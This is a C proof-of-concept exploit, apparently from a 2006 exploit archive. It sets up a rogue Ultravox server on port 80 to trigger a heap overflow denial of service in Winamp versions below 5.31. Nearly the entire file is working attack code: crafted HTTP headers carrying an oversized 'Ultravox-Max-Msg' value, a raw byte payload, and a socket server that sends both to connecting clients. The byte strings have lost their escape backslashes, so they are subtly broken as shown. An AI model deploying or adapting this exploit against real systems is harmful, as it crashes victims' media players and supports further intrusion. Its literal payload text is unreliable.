/************************************************************************************
Nullsoft Winamp < 5.31 Ultravox "Ultravox-Max-Msg" Heap Overflow Dos POC

by cocoruder(frankruder_at_hotmail.com),2006/10/30

use like "winamp_unsv.exe ultravox-max-msg_value",then the winamp_unsv(simple ultravox 
server) will listen on tcp port 80,when winamp connect the server via ultravox protocol

usage example:
    winamp_unsv.exe 500000000
    winamp_unsv.exe 2147481601

**************************************************************************************/


#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <winsock.h>
 
#define SERVER_PORT  80

unsigned char    buff1_header1[]=
"HTTP/1.0 200 OKx0Dx0A"
"Server: Ultravox 3.0x0Dx0A"
"Content-Type: misc/ultravoxx0Dx0A"
"Ultravox-SID: 13381x0Dx0A"
"Ultravox-Avg-Bitrate: 16000x0Dx0A"
"Ultravox-Max-Bitrate: 24000x0Dx0A"
"Ultravox-Max-Msg: ";

unsigned char    buff1_header2[]=
"x0Dx0A"
"Ultravox-Stream-Info: Ultravox;Live Streamx0Dx0A"
"Ultravox-Msg-Que: 42x0Dx0A"
"Ultravox-Max-Fragments: 1x0Dx0Ax0Dx0A";

//4294965247
//1073739776
//1073739775
//1000000000
// 500000000
//  50000000

unsigned char    buff2[]=
                                                        "x5ax00"
"x39x01x01xe0x00x01x00x01x00x01x3cx6dx65x74x61x64"
"x61x74x61x3ex3cx6cx65x6ex67x74x68x3ex30x3cx2fx6c"
"x65x6ex67x74x68x3ex3cx73x6fx6fx6ex3ex4dx6fx72x65"
"x20x6fx6ex20x54x48x45x20x35x30x73x3cx2fx73x6fx6f"
"x6ex3ex3cx73x6fx6ex67x3ex3cx6ex61x6dx65x3ex54x69"
"x6ex61x20x4dx61x72x69x65x20x28x31x39x35x35x29x3c"
"x2fx6ex61x6dx65x3ex3cx61x6cx62x75x6dx3ex47x72x65"
"x61x74x65x73x74x20x48x69x74x73x3cx2fx61x6cx62x75"
"x6dx3ex3cx61x72x74x69x73x74x3ex50x65x72x72x79x20"
"x43x6fx6dx6fx20x6fx26x23x34x37x3bx4dx69x74x63x68"
"x65x6cx6cx20x41x79x72x65x73x3cx2fx61x72x74x69x73"
"x74x3ex3cx61x6cx62x75x6dx5fx61x72x74x3ex78x6dx2f"
"x73x74x61x74x69x6fx6ex5fx6cx6fx67x6fx5fx35x2ex6a"
"x70x67x3cx2fx61x6cx62x75x6dx5fx61x72x74x3ex3cx73"
"x65x72x69x61x6cx3ex2dx31x3cx2fx73x65x72x69x61x6c"
"x3ex3cx73x6fx6ex67x5fx69x64x3ex2dx31x3cx2fx73x6f"
"x6ex67x5fx69x64x3ex3cx61x6dx67x5fx73x6fx6ex67x5f"
"x69x64x3ex2dx31x3cx2fx61x6dx67x5fx73x6fx6ex67x5f"
"x69x64x3ex3cx61x6dx67x5fx61x72x74x69x73x74x5fx69"
"x64x3ex2dx31x3cx2fx61x6dx67x5fx61x72x74x69x73x74"
"x5fx69x64x3ex3cx61x6dx67x5fx61x6cx62x75x6dx5fx69"
"x64x3ex2dx31x3cx2fx61x6dx67x5fx61x6cx62x75x6dx5f"
"x69x64x3ex3cx69x74x75x6ex65x73x5fx73x6fx6ex67x5f"
"x69x64x3ex2dx31x3cx2fx69x74x75x6ex65x73x5fx73x6f"
"x6ex67x5fx69x64x3ex3cx69x74x75x6ex65x73x5fx61x72"
"x74x69x73x74x5fx69x64x3ex2dx31x3cx2fx69x74x75x6e"
"x65x73x5fx61x72x74x69x73x74x5fx69x64x3ex3cx69x74"
"x75x6ex65x73x5fx61x6cx62x75x6dx5fx69x64x3ex2dx31"
"x3cx2fx69x74x75x6ex65x73x5fx61x6cx62x75x6dx5fx69"
"x64x3ex3cx2fx73x6fx6ex67x3ex3cx2fx6dx65x74x61x64"
"x61x74x61x3ex00x5ax00x80x03x03x67xffxf9x5cx40x0b"
"xc1x5cx01x62x31xa5xe3x40x0ex92xdax57x42x9cxfax68"
"xd3xb3xdbx4bx69x89x04x00x00x2bx8cxbbx5fx92xf3x34"
"x5ax91x5bx43xb0xe1x9bx2fx26x66x32x67x45x59x1ex3c"
"x68x87xfdx97x96xa5x75x18x0ax27x04x0fx09xebx20xb4"
"x92x0ex18xc5xbcxc8xf8xa6x51x12x29xe0xf9x81x1bxa6";

 
int main (int argc, char *argv[])
{
   int                        i, num=1, rc, on = 1;
   int                        listen_sd, accept_sd;
   char                        buffer[80];
   struct sockaddr_in        addr;
   WSADATA                    wsadata;
   unsigned char            *lpbuff;
   DWORD                    bufflen;

    int                        aa=-0x1000;
   
 
   WSAStartup(MAKEWORD(2,2),&wsadata);

   listen_sd = socket(AF_INET, SOCK_STREAM, 0);
   if (listen_sd < 0)
   {
      perror("socket() failed");
      exit(-1);
   }
 

   rc = setsockopt(listen_sd,
                   SOL_SOCKET,  SO_REUSEADDR,
                   (char *)&on, sizeof(on));
   if (rc < 0)
   {
      perror("setsockopt() failed");
      closesocket(listen_sd);
      exit(-1);
   }
 
    
   
   //Bind the socket 
   memset(&addr, 0, sizeof(addr));
   addr.sin_family      = AF_INET;
   addr.sin_addr.s_addr = htonl(INADDR_ANY);
   addr.sin_port        = htons(SERVER_PORT);
   rc = bind(listen_sd,
             (struct sockaddr *)&addr, sizeof(addr));
   if (rc < 0)
   {
      perror("bind() failed");
      closesocket(listen_sd);
      exit(-1);
   }
 

   rc = listen(listen_sd, 5);
   if (rc < 0)
   {
      perror("listen() failed");
      closesocket(listen_sd);
      exit(-1);
   }
 

   printf("The server is readyn");


   bufflen=sizeof(buff1_header1)-1+strlen(argv[1])+sizeof(buff1_header2)-1;
   lpbuff=(unsigned char *)malloc(bufflen);
   if (lpbuff==NULL)
   {
       printf("malloc error!n");
       return -1;
   }

   memset(lpbuff,0,bufflen);
   strcat((char *)lpbuff,(char *)buff1_header1);
   strcat((char *)lpbuff,(char *)argv[1]);
   strcat((char *)lpbuff,(char *)buff1_header2);


   for (i=0; i < num; i++)
   {

      printf("Interation: %dn", i+1);
      printf("  waiting on accept()n");
      accept_sd = accept(listen_sd, NULL, NULL);
      if (accept_sd < 0)
      {
         perror("accept() failed");
         closesocket(listen_sd);
         exit(-1);
      }
      printf("  accept completed successfullyn");
 

      printf("  wait for client to send us a messagen");

      

      rc = recv(accept_sd, buffer, sizeof(buffer), 0);
      if (rc <= 0)
      {
         perror("recv() failed");
         closesocket(listen_sd);
         closesocket(accept_sd);
         exit(-1);
      }
      printf("  <%s>n", buffer);

      rc= send(accept_sd,(char *)lpbuff,bufflen,0);
      if (rc>0)
      {
          printf("send ultravox header OK!n");
      }


      rc=send(accept_sd,(char *)buff2,sizeof(buff2)-1,0);
      if (rc>0)
      {
          printf("send ultravox first stream OK!n");
      }
          
 

     while (1)
     {
         Sleep(1000);
     }
   }
 
   closesocket(listen_sd);

   return    0;

}

// www.Syue.com [2006-11-03]